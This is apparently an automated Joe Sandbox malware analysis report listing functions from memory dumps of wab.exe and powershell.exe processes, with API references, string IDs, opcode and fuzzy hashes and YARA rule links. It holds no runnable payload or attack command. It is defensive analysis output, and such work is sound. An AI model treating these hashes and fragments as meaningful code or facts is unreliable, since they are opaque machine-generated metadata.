                                                • Instruction Fuzzy Hash: 96017136661322EBC7119E68DC4CE4A775CEF057B17540A20FA1EDB148D726F911DAE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E63F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 222E655C
                                                  • Part of subcall function 222E62BC: IsProcessorFeaturePresent.KERNEL32(00000017,222E62AB,00000000,?,?,?,?,00000016,?,?,222E62B8,00000000,00000000,00000000,00000000,00000000), ref: 222E62BE
                                                  • Part of subcall function 222E62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 222E62E0
                                                  • Part of subcall function 222E62BC: TerminateProcess.KERNEL32(00000000), ref: 222E62E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                • String ID: *?$.
                                                • API String ID: 2667617558-3972193922
                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                • Instruction ID: 9828d27e0640c13951a03c7fdec31e3a157602effa1d48a166b334e08ee9be26
                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                • Instruction Fuzzy Hash: BF51B271E0030A9FDB14CFA8CD80ABDBBB5EF58314F648169D559E730AE636BA01DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: : $Se.
                                                • API String ID: 4218353326-4089948878
                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                • Instruction ID: ae2826590be5a86b2fb00d4e691f9f77a9ed143b4d45631980d5e880961011b5
                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                • Instruction Fuzzy Hash: 551101B1A00349AECB10CFA89C40BDEFBFCAF19704F50405AE54AE7212E6706A02D760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 222E2903
                                                  • Part of subcall function 222E35D2: RaiseException.KERNEL32(?,?,?,222E2925,00000000,00000000,00000000,?,?,?,?,?,222E2925,?,222F21B8), ref: 222E3632
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 222E2920
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                • Opcode ID: 7bfd0f0e5b9abc8d7b94fa4d4042c1cc09ddf3669a3677cf9f2bc147a7f02a78
                                                • Instruction ID: 8595fc09a8b6db6730bedaa2c0342fb053e5144e210e24f94e0e952c3f6822f9
                                                • Opcode Fuzzy Hash: 7bfd0f0e5b9abc8d7b94fa4d4042c1cc09ddf3669a3677cf9f2bc147a7f02a78
                                                • Instruction Fuzzy Hash: 64F0A43490030D778B00A6A4ED449AA77AC9B25750BD04374EA2F9609DEBF3FA15E5D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetOEMCP.KERNEL32(00000000,?,?,222E6C7C,?), ref: 222E6A1E
                                                • GetACP.KERNEL32(00000000,?,?,222E6C7C,?), ref: 222E6A35
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |l."
                                                • API String ID: 0-2668083892
                                                • Opcode ID: b75f81c3cc7d0cab1cf07711a10ab01b0add4c82cdf233b1f7f03b10dbbb3fb8
                                                • Instruction ID: f92f1fbcb53ce2276e88e4cd5bb84648f72ae5520491c3206c2f4c2439ab0176
                                                • Opcode Fuzzy Hash: b75f81c3cc7d0cab1cf07711a10ab01b0add4c82cdf233b1f7f03b10dbbb3fb8
                                                • Instruction Fuzzy Hash: DCF03C30840249CBD700DBA4C94876C7775FB41335F944744E92D8A2DAEB7F6985DB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 08351520 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vkj
                                                • API String ID: 0-3821012782
                                                • Opcode ID: acaca4cdc4ecd427296663168f4d9575664b9a743d4861068cab5bdd207d7fb7
                                                • Instruction ID: f1b61e4eac1a3b19f51c0a4c668313895447c378aee69f0a09f658668154e325
                                                • Opcode Fuzzy Hash: acaca4cdc4ecd427296663168f4d9575664b9a743d4861068cab5bdd207d7fb7
                                                • Instruction Fuzzy Hash: 9AB14D70E00209DFDF24DFA9C885BDEBBF2AF88715F148529DC15A7294EB749846CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08351DF0 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c06915236e4c98eee209e039d54b679bf8cecc7af54aec5c0ea9efce257049e
                                                • Instruction ID: 7c95d9d366612b838d0eb1b9f09851deb3220f603357e06bd0be956b0c7c8a5c
                                                • Opcode Fuzzy Hash: 2c06915236e4c98eee209e039d54b679bf8cecc7af54aec5c0ea9efce257049e
                                                • Instruction Fuzzy Hash: A8B16170E00209DFDF10CFA9C985BDEBBF2AF88355F148629E815E7254EB749846CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07576318 Relevance: 15.4, Strings: 12, Instructions: 405COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-1572487497
                                                • Opcode ID: 25a9ed25b1d4aa724fb3a88f4cb5612ef3fe8f3d592f18cf3cfe39a5e7f84490
                                                • Instruction ID: f5b36335e8304a1958a650d9fc5127c84c8c757aee2263995af1e5d414f7bd8c
                                                • Opcode Fuzzy Hash: 25a9ed25b1d4aa724fb3a88f4cb5612ef3fe8f3d592f18cf3cfe39a5e7f84490
                                                • Instruction Fuzzy Hash: 59D107B1704646CFCF258F29E8106EABBF2FF85210F5484ABD445CB251DB31D955CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6D968 Relevance: 10.5, Strings: 8, Instructions: 523COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8Nkj$Hgq$h]kj$h]kj$h]kj$$cq$$cq$Ikj
                                                • API String ID: 0-1331133414
                                                • Opcode ID: 5917d42283fb021a471abe8c31e6b5ef29c75bb385e78d89ce770b48b31459db
                                                • Instruction ID: 63326fbbbf704688556ceeb7c4329736d73e48ca7ddecc8c5d5ffcf59d181ed9
                                                • Opcode Fuzzy Hash: 5917d42283fb021a471abe8c31e6b5ef29c75bb385e78d89ce770b48b31459db
                                                • Instruction Fuzzy Hash: 21224F35B002149FCB25DF24C8586AEBBB2FF89304F1580A9D40AAB361DF359E85DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 075758C8 Relevance: 9.0, Strings: 7, Instructions: 251COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-4227879362
                                                • Opcode ID: 0e64229d8c8da719d7497bde810a7771061af7045c9af1d17db27c96ea39ac0a
                                                • Instruction ID: 45b9b2eec82853cf70fcd87fa155568ca8a15a4155391353a48218a70b5dc57c
                                                • Opcode Fuzzy Hash: 0e64229d8c8da719d7497bde810a7771061af7045c9af1d17db27c96ea39ac0a
                                                • Instruction Fuzzy Hash: 6A8139B171020A9FCF249A35A8017FA7BA6BF81350F54847BE5058B292FF35DD50C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 075729C0 Relevance: 5.6, Strings: 4, Instructions: 588COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq
                                                • API String ID: 0-1446110543
                                                • Opcode ID: 62add4150e1869aa485cd920aa9445dbf3ae7ca2fad6a5a6a07d6fb7133a20c5
                                                • Instruction ID: 3f64eab05fe4fd7c5b52845cbe902cc1efbb171bf0f30e69291ce31388bb5aec
                                                • Opcode Fuzzy Hash: 62add4150e1869aa485cd920aa9445dbf3ae7ca2fad6a5a6a07d6fb7133a20c5
                                                • Instruction Fuzzy Hash: 521228B17042568FCB259B68A4016FABBB2BFC5321F1484BBD945CB651DB31CD82C7E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 075758A9 Relevance: 5.2, Strings: 4, Instructions: 154COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: 62e5fa26981b4be96b5f18e381fe6d79f9ee18a8493fd59d66b9d564e067f85f
                                                • Instruction ID: 2ac5c5471256b7657a25e45a32716036142369225b12e838b0a8ce66efebf727
                                                • Opcode Fuzzy Hash: 62e5fa26981b4be96b5f18e381fe6d79f9ee18a8493fd59d66b9d564e067f85f
                                                • Instruction Fuzzy Hash: 825129F161020ADFDF258E21E5417FA7BA5BF81351F4844A7E8018B292FB35DE94CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07576A65 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84ul$tPcq
                                                • API String ID: 0-1718874687
                                                • Opcode ID: 0b00ca88a8998147c87e47798b25311d299fd4813d6b2359a01e5de29cea4c1c
                                                • Instruction ID: 875cf1dfaefff8f1e0c640cb23adc8045e488017cf271026fcd40f25b70cf3f0
                                                • Opcode Fuzzy Hash: 0b00ca88a8998147c87e47798b25311d299fd4813d6b2359a01e5de29cea4c1c
                                                • Instruction Fuzzy Hash: 3751D4B06093959FC7128B54D850AA6BFB1FF86314F19C49BD588DF293C6319C85CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6E620 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h]kj$Ikj
                                                • API String ID: 0-2804767068
                                                • Opcode ID: 906c1cfc324b9585fa496e52b72f6351122e97616b72d5ad7f22405e738c7444
                                                • Instruction ID: c33c2c17b3e0530b6c6fd5499969c3e022e5894add687ddb308251645bb77a12
                                                • Opcode Fuzzy Hash: 906c1cfc324b9585fa496e52b72f6351122e97616b72d5ad7f22405e738c7444
                                                • Instruction Fuzzy Hash: 17311935B011288FCB25DB64C8586EEB7B2BF49305F1444E9D40AAB252CF359E86DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07575A3E Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq
                                                • API String ID: 0-2695052418
                                                • Opcode ID: 46c2d8c51013e2c6f56d89dcd90f745561edcc3046b54df46e8edd534163a7dd
                                                • Instruction ID: caec6396d096c9dafcf8ccc544868202eb8dccb681b34dfa838e31d5d3afe67c
                                                • Opcode Fuzzy Hash: 46c2d8c51013e2c6f56d89dcd90f745561edcc3046b54df46e8edd534163a7dd
                                                • Instruction Fuzzy Hash: 96110EB0600109EFDB249F60E841AEEBBA2FB85315F248566E8055B242EB31DD60CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F63670 Relevance: 1.6, Strings: 1, Instructions: 308COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: U
                                                • API String ID: 0-3372436214
                                                • Opcode ID: f07029d9251bded8462f8f842462a8e5e153b933b9e45282bec45af49e4adb6d
                                                • Instruction ID: 0a3ca63ff22c815d4030ddfba1610c3afdcef5f84098d84d6c75118afd5692fa
                                                • Opcode Fuzzy Hash: f07029d9251bded8462f8f842462a8e5e153b933b9e45282bec45af49e4adb6d
                                                • Instruction Fuzzy Hash: 7CD11474E05209AFDB05CFA8C484A9DFBB2FF89310F248159E815AB361C775EE81DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08351514 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vkj
                                                • API String ID: 0-3821012782
                                                • Opcode ID: 2750f914e70fb0a9fa3f4a1eb652b08df168efadeb302ec9222243f8663268c3
                                                • Instruction ID: 7e205f5638dd610c9da88d091dac4dc2fc85faefd5aa2c92a799a5fb6e15110b
                                                • Opcode Fuzzy Hash: 2750f914e70fb0a9fa3f4a1eb652b08df168efadeb302ec9222243f8663268c3
                                                • Instruction Fuzzy Hash: C6B15D70E00209DFDF20DFA9C885BDEBBF2AF88315F148529DC15A7294EB749846CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6C968 Relevance: .3, Instructions: 347COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af1976910858f5d0b93a60c15e8fed1fd05e268f45d52712d760f342b5498bb5
                                                • Instruction ID: c45bd488d46e461999f31d37b69be55a2b7c0f370a1e8929bc1a2d1a7e0f633f
                                                • Opcode Fuzzy Hash: af1976910858f5d0b93a60c15e8fed1fd05e268f45d52712d760f342b5498bb5
                                                • Instruction Fuzzy Hash: 37E10A74A00209AFCB15DF98C494AADFBF2FF89320F258559E885AB351C735ED81DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6B2B0 Relevance: .3, Instructions: 338COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03716d0dde729e9bd4199fb4eedcb7c4b7d21506002fba0b79e67750ddb97a04
                                                • Instruction ID: 2433136b2e9fbfdf4c93c2ad10e36e5df241ce0fba912c0c67b87a39365eb286
                                                • Opcode Fuzzy Hash: 03716d0dde729e9bd4199fb4eedcb7c4b7d21506002fba0b79e67750ddb97a04
                                                • Instruction Fuzzy Hash: FAC1C335A00208DFCB14DFA4C985AADBBB2FF85310F254569E806DB365CB34ED89DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08351DE4 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57bccc84952eb07550aac89d0581979d14a5a6a719773f72910a77eedafb5d29
                                                • Instruction ID: eb4a75da763fada38749171a8046a3f4732256a044df13121adc58ed4cc9db96
                                                • Opcode Fuzzy Hash: 57bccc84952eb07550aac89d0581979d14a5a6a719773f72910a77eedafb5d29
                                                • Instruction Fuzzy Hash: 40B16270E00209DFDF10CFA9D885BDEBBF1AF88355F148629E815E7254EB749846CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F62B48 Relevance: .2, Instructions: 219COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4d09fb42c534f8b1413a884ad3ae190e5f3ab280db2ee81fde44d6ef904c5ad
                                                • Instruction ID: e3b06428179bfcfa28c32c135b07ae17602fa2f9841c833143085f5303669cb8
                                                • Opcode Fuzzy Hash: f4d09fb42c534f8b1413a884ad3ae190e5f3ab280db2ee81fde44d6ef904c5ad
                                                • Instruction Fuzzy Hash: CC916C74A00A059FCB45CF98C4949AEFBB1FF89320B24869AD455AB3A5C735FC51CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6A7E0 Relevance: .2, Instructions: 197COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df63519a9cf0c7e6344002dc6043eb5d8e13db0cdfa3f9e576d5dd27a21bdab4
                                                • Instruction ID: d2b1cb62e906fac38b7b72bb387a26ff7d2cb54924481d017562d519320a859c
                                                • Opcode Fuzzy Hash: df63519a9cf0c7e6344002dc6043eb5d8e13db0cdfa3f9e576d5dd27a21bdab4
                                                • Instruction Fuzzy Hash: 3B71CE34A01244DFCB15DBA4C884AADBBF2FF89314F2584A9E445AB362CB38EC45DF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68ABE Relevance: .2, Instructions: 188COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10e6aa0980dda64a03f545d6ef95fdd550d8d8a79bc81f117c26962389f3866c
                                                • Instruction ID: 7fbefa91890f3178c7bdd63b53f8ea4b9287f2585a408e6736dc3f61a8d49f58
                                                • Opcode Fuzzy Hash: 10e6aa0980dda64a03f545d6ef95fdd550d8d8a79bc81f117c26962389f3866c
                                                • Instruction Fuzzy Hash: 72713970E00208DFDB15DFA4D884AADBBF2BF88354F148529D416AB3A1DF74AD86DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68950 Relevance: .2, Instructions: 167COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 303b9b62ab66587004f48781f7c301ade17e031e2c121c7092cf481c84dbd71f
                                                • Instruction ID: c36bbd72fd94cfd8b7ac35ac52d0628c0eb1658ac6c405e133ee25da27c51296
                                                • Opcode Fuzzy Hash: 303b9b62ab66587004f48781f7c301ade17e031e2c121c7092cf481c84dbd71f
                                                • Instruction Fuzzy Hash: B4518F70A002049FDB14DFA8C884A9DBBF2FF89354F148569E415DB361DF74AC42DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F684BB Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6a00a2e923ac4c59d8e2a33013d73e29f0397cb7cdd773d7d82e6fc3d33b8cc
                                                • Instruction ID: f72af671d953ee9a5491fd5cc136768e977d418bb55ddb073727bb3bf0064acc
                                                • Opcode Fuzzy Hash: d6a00a2e923ac4c59d8e2a33013d73e29f0397cb7cdd773d7d82e6fc3d33b8cc
                                                • Instruction Fuzzy Hash: C7616034E002498FCB04DFA4C594A9DBBB2FF84350F248659E402AF365DB74ED89CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F684C8 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e010bb523780f376b846b30964b52115f8a2f8b6884f0f676ce2a0d0a774ee9
                                                • Instruction ID: 6063078944ba73cf95678ae2d1eae697797e58ac2b86f971cd3cd37b2677d8aa
                                                • Opcode Fuzzy Hash: 4e010bb523780f376b846b30964b52115f8a2f8b6884f0f676ce2a0d0a774ee9
                                                • Instruction Fuzzy Hash: 7D613E34E002499FDB05DFA4C594A9DBBB2FF85350F258658E402AF365DB78ED89CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68943 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8373f65d14d2050dc7ee4395428399dba2f866cc71f87f65cae00eaaf34aa810
                                                • Instruction ID: 477e5bed531bda47af27fe61c3bd467e464957be0bf684d912c5bb765c60318f
                                                • Opcode Fuzzy Hash: 8373f65d14d2050dc7ee4395428399dba2f866cc71f87f65cae00eaaf34aa810
                                                • Instruction Fuzzy Hash: 83518D70E006089FDB18DFA8C8846ADBBB2FF89354F14852DD406AB761DB74AC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 075729A5 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 770770be0617bfdd2a4c7dc741cb39ade4f27cb4a72b9113620c58b3a8c329b4
                                                • Instruction ID: 7736116639e387fec2ccaa6edefc4a497c4779fabae92accc2f548c513814287
                                                • Opcode Fuzzy Hash: 770770be0617bfdd2a4c7dc741cb39ade4f27cb4a72b9113620c58b3a8c329b4
                                                • Instruction Fuzzy Hash: 7741E8F1A002068FCF318F289541AEA7BB1FF99364F1584A7D8089F651DB75DD81CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6B808 Relevance: .1, Instructions: 118COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdd9604e3db9b9040dfd786a94604a94737f44af5f5a24271f6818a8b1714955
                                                • Instruction ID: 9d9671388a87ea592a9c7f231538432fb56c3ee9eaa933f23dd6f40e3b45f633
                                                • Opcode Fuzzy Hash: bdd9604e3db9b9040dfd786a94604a94737f44af5f5a24271f6818a8b1714955
